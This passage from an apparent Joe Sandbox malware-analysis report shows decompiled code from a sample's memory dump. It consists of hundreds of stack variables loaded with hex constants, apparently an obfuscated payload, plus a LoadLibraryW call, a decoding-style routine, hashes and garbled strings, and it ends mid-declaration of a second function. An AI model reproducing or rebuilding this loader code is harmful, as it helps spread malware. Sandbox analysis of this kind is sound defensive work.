                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				intOrPtr _v1560;
                  				intOrPtr _v1564;
                  				intOrPtr _v1568;
                  				intOrPtr _v1572;
                  				intOrPtr _v1576;
                  				intOrPtr _v1580;
                  				intOrPtr _v1584;
                  				intOrPtr _v1588;
                  				intOrPtr _v1592;
                  				intOrPtr _v1596;
                  				intOrPtr _v1600;
                  				intOrPtr _v1604;
                  				intOrPtr _v1608;
                  				intOrPtr _v1612;
                  				intOrPtr _v1616;
                  				intOrPtr _v1620;
                  				intOrPtr _v1624;
                  				intOrPtr _v1628;
                  				intOrPtr _v1632;
                  				intOrPtr _v1636;
                  				intOrPtr _v1640;
                  				intOrPtr _v1644;
                  				intOrPtr _v1648;
                  				intOrPtr _v1652;
                  				intOrPtr _v1656;
                  				intOrPtr _v1660;
                  				intOrPtr _v1664;
                  				intOrPtr _v1668;
                  				intOrPtr _v1672;
                  				intOrPtr _v1676;
                  				intOrPtr _v1680;
                  				intOrPtr _v1684;
                  				intOrPtr _v1688;
                  				intOrPtr _v1692;
                  				intOrPtr _v1696;
                  				intOrPtr _v1700;
                  				intOrPtr _v1704;
                  				intOrPtr _v1708;
                  				intOrPtr _v1712;
                  				intOrPtr _v1716;
                  				intOrPtr _v1720;
                  				intOrPtr _v1724;
                  				intOrPtr _v1728;
                  				intOrPtr _v1732;
                  				intOrPtr _v1736;
                  				intOrPtr _v1740;
                  				intOrPtr _v1744;
                  				intOrPtr _v1748;
                  				intOrPtr _v1752;
                  				intOrPtr _v1756;
                  				intOrPtr _v1760;
                  				intOrPtr _v1764;
                  				intOrPtr _v1768;
                  				intOrPtr _v1772;
                  				intOrPtr _v1776;
                  				intOrPtr _v1780;
                  				intOrPtr _v1784;
                  				intOrPtr _v1788;
                  				intOrPtr _v1792;
                  				intOrPtr _v1796;
                  				intOrPtr _v1800;
                  				intOrPtr _v1804;
                  				intOrPtr _v1808;
                  				intOrPtr _v1812;
                  				intOrPtr _v1816;
                  				intOrPtr _v1820;
                  				intOrPtr _v1824;
                  				intOrPtr _v1828;
                  				intOrPtr _v1832;
                  				intOrPtr _v1836;
                  				intOrPtr _v1840;
                  				intOrPtr _v1844;
                  				intOrPtr _v1848;
                  				intOrPtr _v1852;
                  				intOrPtr _v1856;
                  				intOrPtr _v1860;
                  				intOrPtr _v1864;
                  				intOrPtr _v1868;
                  				intOrPtr _v1872;
                  				intOrPtr _v1876;
                  				intOrPtr _v1880;
                  				intOrPtr _v1884;
                  				char _v1888;
                  				struct HINSTANCE__* _t474;
                  
                  				_v1888 = 0xa41c4ed0;
                  				_v1884 = 0x1a33c848;
                  				_v1880 = 0xf78674dd;
                  				_v1876 = 0x4d35aed;
                  				_v1872 = 0x5597c7b0;
                  				_v1868 = 0xb0ef52b0;
                  				_v1864 = 0x9b5bf2a7;
                  				_v1860 = 0xbf81a217;
                  				_v1856 = 0x3adcb09b;
                  				_v1852 = 0xe8ac849c;
                  				_v1848 = 0x57b96c20;
                  				_v1844 = 0xcd9f7235;
                  				_v1840 = 0xf420170d;
                  				_v1836 = 0x14cdf27a;
                  				_v1832 = 0xfd5eb0fb;
                  				_v1828 = 0x39318b65;
                  				_v1824 = 0x65d03115;
                  				_v1820 = 0x95260aff;
                  				_v1816 = 0x2e67c28e;
                  				_v1812 = 0xa1f4a8f4;
                  				_v1808 = 0xc812f1ab;
                  				_v1804 = 0xd934dc9c;
                  				_v1800 = 0xa4e6685;
                  				_v1796 = 0xfe213c23;
                  				_v1792 = 0x43c6d29;
                  				_v1788 = 0xcf12bcb8;
                  				_v1784 = 0x9f98cc3;
                  				_v1780 = 0xa1b2d167;
                  				_v1776 = 0x7fad3c40;
                  				_v1772 = 0xa80d3c34;
                  				_v1768 = 0xc8f714d7;
                  				_v1764 = 0x671d7785;
                  				_v1760 = 0x4a0ac7c8;
                  				_v1756 = 0x21c03928;
                  				_v1752 = 0x4555c0d0;
                  				_v1748 = 0x9834af68;
                  				_v1744 = 0xc6d9895d;
                  				_v1740 = 0xda921464;
                  				_v1736 = 0x6b089d64;
                  				_v1732 = 0xfec570b;
                  				_v1728 = 0xc3626a82;
                  				_v1724 = 0xd34a14be;
                  				_v1720 = 0xb7eabcaf;
                  				_v1716 = 0x281b3387;
                  				_v1712 = 0xcabf350d;
                  				_v1708 = 0x207d4223;
                  				_v1704 = 0xbc0cb804;
                  				_v1700 = 0xdefac10b;
                  				_v1696 = 0x679df176;
                  				_v1692 = 0x6390c0b9;
                  				_v1688 = 0x817bdef2;
                  				_v1684 = 0xcb119739;
                  				_v1680 = 0xd62a3fcf;
                  				_v1676 = 0x5b6539ee;
                  				_v1672 = 0x2ebc383e;
                  				_v1668 = 0xf6595eaa;
                  				_v1664 = 0xe1fa3158;
                  				_v1660 = 0xd81c642d;
                  				_v1656 = 0x5b3ff5b2;
                  				_v1652 = 0x25dcb5f4;
                  				_v1648 = 0xb74a4541;
                  				_v1644 = 0x65280c6a;
                  				_v1640 = 0x507410e2;
                  				_v1636 = 0x162eb7ae;
                  				_v1632 = 0x983fe17e;
                  				_v1628 = 0x1dce09e5;
                  				_v1624 = 0x20a01932;
                  				_v1620 = 0xf8c2ec13;
                  				_v1616 = 0xd03324ad;
                  				_v1612 = 0xdda4a81a;
                  				_v1608 = 0xefe7666e;
                  				_v1604 = 0x3499fe41;
                  				_v1600 = 0xfef05481;
                  				_v1596 = 0x4379be19;
                  				_v1592 = 0xac2a8a8c;
                  				_v1588 = 0xaa65ea73;
                  				_v1584 = 0x780f71c2;
                  				_v1580 = 0xbc7e1592;
                  				_v1576 = 0xb46dbbf2;
                  				_v1572 = 0x7f4481aa;
                  				_v1568 = 0x4c400fc5;
                  				_v1564 = 0xd0e27c84;
                  				_v1560 = 0xa0e4f48d;
                  				_v1556 = 0x608f4f65;
                  				_v1552 = 0x81e08196;
                  				_v1548 = 0x12e25f1;
                  				_v1544 = 0x108b753a;
                  				_v1540 = 0x734d6144;
                  				_v1536 = 0x2099d367;
                  				_v1532 = 0x4af859b5;
                  				_v1528 = 0x64274aa4;
                  				_v1524 = 0xd77c3180;
                  				_v1520 = 0xd07c56cd;
                  				_v1516 = 0x63b940a8;
                  				_v1512 = 0xdefbc07f;
                  				_v1508 = 0x1ed0b183;
                  				_v1504 = 0x946279a2;
                  				_v1500 = 0x1b4e182;
                  				_v1496 = 0xbd9e9d5e;
                  				_v1492 = 0xf895b090;
                  				_v1488 = 0x83ef7189;
                  				_v1484 = 0xdb6fdda0;
                  				_v1480 = 0xc43f2288;
                  				_v1476 = 0xfa2ee974;
                  				_v1472 = 0xad630715;
                  				_v1468 = 0x6e3f94ea;
                  				_v1464 = 0xc210224a;
                  				_v1460 = 0x5e42620a;
                  				_v1456 = 0xbdc03864;
                  				_v1452 = 0xfa898059;
                  				_v1448 = 0x5b223206;
                  				_v1444 = 0xe6ee380f;
                  				_v1440 = 0xe9c024a5;
                  				_v1436 = 0x795a214e;
                  				_v1432 = 0xf661e49b;
                  				_v1428 = 0x5d53c5b6;
                  				_v1424 = 0xe92e65b3;
                  				_v1420 = 0xe7f485b4;
                  				_v1416 = 0xe34b82e0;
                  				_v1412 = 0xaac6e570;
                  				_v1408 = 0xd3519085;
                  				_v1404 = 0x9d031edf;
                  				_v1400 = 0x16517768;
                  				_v1396 = 0x6b60337c;
                  				_v1392 = 0x87f162f5;
                  				_v1388 = 0x30b72081;
                  				_v1384 = 0xaf9664d7;
                  				_v1380 = 0xd1c1388f;
                  				_v1376 = 0xbaeca29b;
                  				_v1372 = 0x2614ddd9;
                  				_v1368 = 0xfd4ce0b1;
                  				_v1364 = 0x5c9c68b7;
                  				_v1360 = 0x2676eff1;
                  				_v1356 = 0x3d50e3a3;
                  				_v1352 = 0x53c809b1;
                  				_v1348 = 0x2d212e3b;
                  				_v1344 = 0x84a1010a;
                  				_v1340 = 0xafe995ff;
                  				_v1336 = 0x624ecd4e;
                  				_v1332 = 0xa0b9de9d;
                  				_v1328 = 0xf70d11ba;
                  				_v1324 = 0xe13ac65e;
                  				_v1320 = 0x94330fb1;
                  				_v1316 = 0x4ba9883c;
                  				_v1312 = 0xf9b4aa94;
                  				_v1308 = 0x1528153;
                  				_v1304 = 0xab11f915;
                  				_v1300 = 0xf65a3f7d;
                  				_v1296 = 0xf416523f;
                  				_v1292 = 0x622e2452;
                  				_v1288 = 0xe7dd6fea;
                  				_v1284 = 0xc53292c3;
                  				_v1280 = 0x341cfd;
                  				_v1276 = 0x1bf5cfa4;
                  				_v1272 = 0x3d6d8fc5;
                  				_v1268 = 0x882e2a5d;
                  				_v1264 = 0xf4dab66;
                  				_v1260 = 0x879777e1;
                  				_v1256 = 0x4235fa33;
                  				_v1252 = 0xf7412f63;
                  				_v1248 = 0x744366b8;
                  				_v1244 = 0x5d79780f;
                  				_v1240 = 0x33df1776;
                  				_v1236 = 0xa6b205d3;
                  				_v1232 = 0x7f6a7839;
                  				_v1228 = 0x671dbdce;
                  				_v1224 = 0xedb53a4e;
                  				_v1220 = 0x7885bf0f;
                  				_v1216 = 0x5d5e08dc;
                  				_v1212 = 0xe0da0cb9;
                  				_v1208 = 0x72626c3b;
                  				_v1204 = 0xf7523beb;
                  				_v1200 = 0xd3cbf7c0;
                  				_v1196 = 0xf397c375;
                  				_v1192 = 0xe8e0e8b8;
                  				_v1188 = 0xda2713ea;
                  				_v1184 = 0x61e812b;
                  				_v1180 = 0x1f5e76ae;
                  				_v1176 = 0xfcc0fd26;
                  				_v1172 = 0xa4f96784;
                  				_v1168 = 0xdfc74366;
                  				_v1164 = 0x4770325;
                  				_v1160 = 0xfcfb039;
                  				_v1156 = 0xbb5cd5be;
                  				_v1152 = 0x835bb17f;
                  				_v1148 = 0x45f03008;
                  				_v1144 = 0x8157471b;
                  				_v1140 = 0x92daa034;
                  				_v1136 = 0xc4415ba2;
                  				_v1132 = 0x1b6c5a77;
                  				_v1128 = 0x7e366518;
                  				_v1124 = 0x83ab0c1d;
                  				_v1120 = 0x397b67c4;
                  				_v1116 = 0xbf8a7d;
                  				_v1112 = 0x2e52b5be;
                  				_v1108 = 0x4c915e05;
                  				_v1104 = 0x3753c1d6;
                  				_v1100 = 0x95d39f06;
                  				_v1096 = 0x3d258823;
                  				_v1092 = 0x3608b8f8;
                  				_v1088 = 0xb4fbe8a7;
                  				_v1084 = 0x4c3e8f06;
                  				_v1080 = 0xe8794991;
                  				_v1076 = 0xdccaeb41;
                  				_v1072 = 0x9e236e45;
                  				_v1068 = 0xc17af71c;
                  				_v1064 = 0x4e7519a6;
                  				_v1060 = 0xc27014cc;
                  				_v1056 = 0x4d83d065;
                  				_v1052 = 0x6af34f37;
                  				_v1048 = 0xcd08d804;
                  				_v1044 = 0x3d730bc7;
                  				_v1040 = 0x21e8c57d;
                  				_v1036 = 0x317420d4;
                  				_v1032 = 0x6ebcf6dd;
                  				_v1028 = 0x7247c452;
                  				_v1024 = 0x690e32a5;
                  				_v1020 = 0x265b9d09;
                  				_v1016 = 0xef460e82;
                  				_v1012 = 0xbd38bc0;
                  				_v1008 = 0xce8b0c3b;
                  				_v1004 = 0x87b18560;
                  				_v1000 = 0x923ada08;
                  				_v996 = 0x7954f0df;
                  				_v992 = 0x59d4296d;
                  				_v988 = 0x598866b0;
                  				_v984 = 0x5ebed584;
                  				_v980 = 0x75f303ed;
                  				_v976 = 0x4bd185df;
                  				_v972 = 0x90668e75;
                  				_v968 = 0xef0ec6ee;
                  				_v964 = 0xfb160c3c;
                  				_v960 = 0xdddf860c;
                  				_v956 = 0xe3ec7c97;
                  				_v952 = 0xd84fe87a;
                  				_v948 = 0x4eebf6de;
                  				_v944 = 0x6598361e;
                  				_v940 = 0x2d4f37a9;
                  				_v936 = 0x20c189e8;
                  				_v932 = 0x1da649ac;
                  				_v928 = 0xbb2d17b0;
                  				_v924 = 0x7365b2a6;
                  				_v920 = 0x748039dd;
                  				_v916 = 0x40abf8ad;
                  				_v912 = 0xc2230aa3;
                  				_v908 = 0xddc9542f;
                  				_v904 = 0xd5cbbac;
                  				_v900 = 0x44de193b;
                  				_v896 = 0xe51fd5ad;
                  				_v892 = 0xf9739bdf;
                  				_v888 = 0xf511941f;
                  				_v884 = 0xbb4c8f97;
                  				_v880 = 0x71f29f4a;
                  				_v876 = 0xf93e7335;
                  				_v872 = 0xb3d5a235;
                  				_v868 = 0x8bf5639b;
                  				_v864 = 0xb678715c;
                  				_v860 = 0x1681d985;
                  				_v856 = 0xce6e3dde;
                  				_v852 = 0x5962f64c;
                  				_v848 = 0x1b0fea51;
                  				_v844 = 0xf304da7f;
                  				_v840 = 0x60dd60fc;
                  				_v836 = 0x4894e820;
                  				_v832 = 0xd4c5e951;
                  				_v828 = 0xbc0c6801;
                  				_v824 = 0x1b410e8d;
                  				_v820 = 0x9d4beae1;
                  				_v816 = 0xb4470101;
                  				_v812 = 0xefc6595c;
                  				_v808 = 0x1942297a;
                  				_v804 = 0x452f53c1;
                  				_v800 = 0x60736a8a;
                  				_v796 = 0x1cb5c8c2;
                  				_v792 = 0xa3b92496;
                  				_v788 = 0x3604e2c0;
                  				_v784 = 0x7d04dd0b;
                  				_v780 = 0xf93943b2;
                  				_v776 = 0xa34c9da0;
                  				_v772 = 0x16093c22;
                  				_v768 = 0x6230157f;
                  				_v764 = 0xf80a9182;
                  				_v760 = 0x9d202d62;
                  				_v756 = 0x58881b4d;
                  				_v752 = 0x7261191d;
                  				_v748 = 0xee6a2a6f;
                  				_v744 = 0x8b6ed692;
                  				_v740 = 0xf4ad89c5;
                  				_v736 = 0x902f328c;
                  				_v732 = 0xdae187c2;
                  				_v728 = 0x84c69aaf;
                  				_v724 = 0x8b583ddc;
                  				_v720 = 0x3154736a;
                  				_v716 = 0xf0ba94f8;
                  				_v712 = 0x371d3c0;
                  				_v708 = 0x9490ef0f;
                  				_v704 = 0x2d449fdf;
                  				_v700 = 0xb6d886dd;
                  				_v696 = 0x34ac4b5b;
                  				_v692 = 0x4add82f5;
                  				_v688 = 0x5643055a;
                  				_v684 = 0xedb6a896;
                  				_v680 = 0xf3b73e97;
                  				_v676 = 0xcd8bf45d;
                  				_v672 = 0x93a0ea35;
                  				_v668 = 0xf51d7bfd;
                  				_v664 = 0xd083f728;
                  				_v660 = 0x5978c810;
                  				_v656 = 0xacfb548d;
                  				_v652 = 0x681791b;
                  				_v648 = 0xab7f89b7;
                  				_v644 = 0x4f840277;
                  				_v640 = 0x45cf5527;
                  				_v636 = 0xafbc6fa5;
                  				_v632 = 0x7709f48f;
                  				_v628 = 0x8685cbd3;
                  				_v624 = 0x39eebbf5;
                  				_v620 = 0x5d1c8064;
                  				_v616 = 0x20fe1dce;
                  				_v612 = 0x69db75cc;
                  				_v608 = 0x9b65dc5a;
                  				_v604 = 0x27934866;
                  				_v600 = 0xf19b8bb6;
                  				_v596 = 0x887f0721;
                  				_v592 = 0x679fda8;
                  				_v588 = 0x78284a0;
                  				_v584 = 0x265fdb89;
                  				_v580 = 0x73ed0821;
                  				_v576 = 0x7d12f58b;
                  				_v572 = 0xc29cc904;
                  				_v568 = 0xf8cd14ad;
                  				_v564 = 0x5a59d9e2;
                  				_v560 = 0xa4ddcf31;
                  				_v556 = 0x91ce662e;
                  				_v552 = 0xc476dab;
                  				_v548 = 0xe8647b34;
                  				_v544 = 0x7a59bdcd;
                  				_v540 = 0xff29671e;
                  				_v536 = 0x37ab0d4d;
                  				_v532 = 0x3b7b2c58;
                  				_v528 = 0xdaca9837;
                  				_v524 = 0x5d95c73f;
                  				_v520 = 0x8d2d8ef2;
                  				_v516 = 0xe3a7eb3d;
                  				_v512 = 0x93410f8b;
                  				_v508 = 0x40690df9;
                  				_v504 = 0x56050e5c;
                  				_v500 = 0xdf7e7ef6;
                  				_v496 = 0xe57bff2d;
                  				_v492 = 0x8053dea3;
                  				_v488 = 0xca387b31;
                  				_v484 = 0x32eccb66;
                  				_v480 = 0xafb3b6b8;
                  				_v476 = 0x8f23f2d6;
                  				_v472 = 0x5fd00aa;
                  				_v468 = 0x7ba3d053;
                  				_v464 = 0xbed15460;
                  				_v460 = 0x91a7f84b;
                  				_v456 = 0x509deafe;
                  				_v452 = 0x8be07147;
                  				_v448 = 0x2a1903f7;
                  				_v444 = 0x74e13ee;
                  				_v440 = 0x46703439;
                  				_v436 = 0xf34281b8;
                  				_v432 = 0x88689edc;
                  				_v428 = 0xae06c319;
                  				_v424 = 0x809e0f7;
                  				_v420 = 0x32e2a63c;
                  				_v416 = 0x351aba4e;
                  				_v412 = 0x6bda9779;
                  				_v408 = 0xff25d6b;
                  				_v404 = 0xf19e2b12;
                  				_v400 = 0xe09ee902;
                  				_v396 = 0x30162918;
                  				_v392 = 0xf554291d;
                  				_v388 = 0xd293bf0c;
                  				_v384 = 0xa5aaa34d;
                  				_v380 = 0x18af0b32;
                  				_v376 = 0x45d3b443;
                  				_v372 = 0x8a8542bb;
                  				_v368 = 0xb2938f72;
                  				_v364 = 0x375b0514;
                  				_v360 = 0xa0175b99;
                  				_v356 = 0xab05d150;
                  				_v352 = 0xb2ab1a30;
                  				_v348 = 0xe6d1d6f1;
                  				_v344 = 0x5bc1d28d;
                  				_v340 = 0x31ab7862;
                  				_v336 = 0xb32f6993;
                  				_v332 = 0x3bff57b5;
                  				_v328 = 0xf4362081;
                  				_v324 = 0xa41ea41;
                  				_v320 = 0xf5554d12;
                  				_v316 = 0xe74be567;
                  				_v312 = 0xdda94f36;
                  				_v308 = 0x9942b8d7;
                  				_v304 = 0xa73018e6;
                  				_v300 = 0x65aa1921;
                  				_v296 = 0xa0ad1bda;
                  				_v292 = 0xfa54f506;
                  				_v288 = 0x36d533d2;
                  				_v284 = 0x2a17a738;
                  				_v280 = 0x24a73c55;
                  				_v276 = 0x25c6e7c;
                  				_v272 = 0x792542e6;
                  				_v268 = 0x60fe3e84;
                  				_v264 = 0xe894fa28;
                  				_v260 = 0xa8c3bd02;
                  				_v256 = 0xdec79a5c;
                  				_v252 = 0xaeea5367;
                  				_v248 = 0x9618cdf9;
                  				_v244 = 0x4d53bb98;
                  				_v240 = 0xc82415fb;
                  				_v236 = 0x311045a0;
                  				_v232 = 0x435d92ea;
                  				_v228 = 0x64d81a20;
                  				_v224 = 0x1a745c98;
                  				_v220 = 0xbb1cacab;
                  				_v216 = 0xb68b62f7;
                  				_v212 = 0x2262a170;
                  				_v208 = 0x244f7cd;
                  				_v204 = 0x634247e8;
                  				_v200 = 0x8e6f29ce;
                  				_v196 = 0xc125d02b;
                  				_v192 = 0xe1fb1246;
                  				_v188 = 0x90ff749d;
                  				_v184 = 0x9d49b7a9;
                  				_v180 = 0x8ae4cd18;
                  				_v176 = 0xdc3b0e33;
                  				_v172 = 0x5357343f;
                  				_v168 = 0x9078d775;
                  				_v164 = 0x7cd42af4;
                  				_v160 = 0x85875278;
                  				_v156 = 0xe098b691;
                  				_v152 = 0xdd539cbf;
                  				_v148 = 0x7b6915e6;
                  				_v144 = 0xdfa72c20;
                  				_v140 = 0x15af0b24;
                  				_v136 = 0x1e90183d;
                  				_v132 = 0xae2521d9;
                  				_v128 = 0x132fe8d2;
                  				_v124 = 0x7628aa01;
                  				_v120 = 0xf98981af;
                  				_v116 = 0xdeee782f;
                  				_v112 = 0x7ff5b8f;
                  				_v108 = 0x3a7c246a;
                  				_v104 = 0x8c6af67;
                  				_v100 = 0x27178fff;
                  				_v96 = 0x40ce6aac;
                  				_v92 = 0xe05cdea;
                  				_v88 = 0x1a09cd63;
                  				_v84 = 0x4ab557a2;
                  				_v80 = 0x578e6083;
                  				_v76 = 0x73ab4d0a;
                  				_v72 = 0x4577df03;
                  				_v68 = 0x388ee30c;
                  				_v64 = 0xa6a001f8;
                  				_v60 = 0xa362abb;
                  				_v56 = 0x4c361001;
                  				_v52 = 0x52b9ecf;
                  				_v48 = 0xf779ca4b;
                  				_v44 = 0xf0d67399;
                  				_v40 = 0x26e6d555;
                  				_v36 = 0xda742f2c;
                  				_v32 = 0x945c9d84;
                  				_v28 = 0x85b2d426;
                  				_v24 = 0x3e9987ee;
                  				_v20 = 0x9c588149;
                  				_v16 = 0x5b70fee9;
                  				_v12 = 0x724f6ac9;
                  				_v8 = 0x3e06e993;
                  				_t482 = E00401A52(0x412320, 0x72fc3a35);
                  				_t474 = LoadLibraryW(_t473); // executed
                  				 *0x4164ec = _t474;
                  				L00401B09(_t482);
                  				_push(0x414710);
                  				_push(0x81c5b25);
                  				return E004012FF( *0x4164ec,  &_v1888, 0x1d7);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 004088E8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: bB^$#B} $4{d$94pF$;.!-$;lbr$?4WS$AA$DaMs$N!Zy$R$.b$X,{;$gK$j$|:$jsT1$nf$o*j$|3`k$9e[$B%y$GBc
                  • API String ID: 1029625771-3166147023
                  • Opcode ID: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction ID: 7dcabeb444d3c38dde185443b52466955599dc9d20e08e1f97c3b9dafdfd80e0
                  • Opcode Fuzzy Hash: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction Fuzzy Hash: 9B82B4F0C467698FDB618F429E8438EBA75BB51345F5096C9C29C3A204CB750BC2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 83%
                  			E0040632A(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
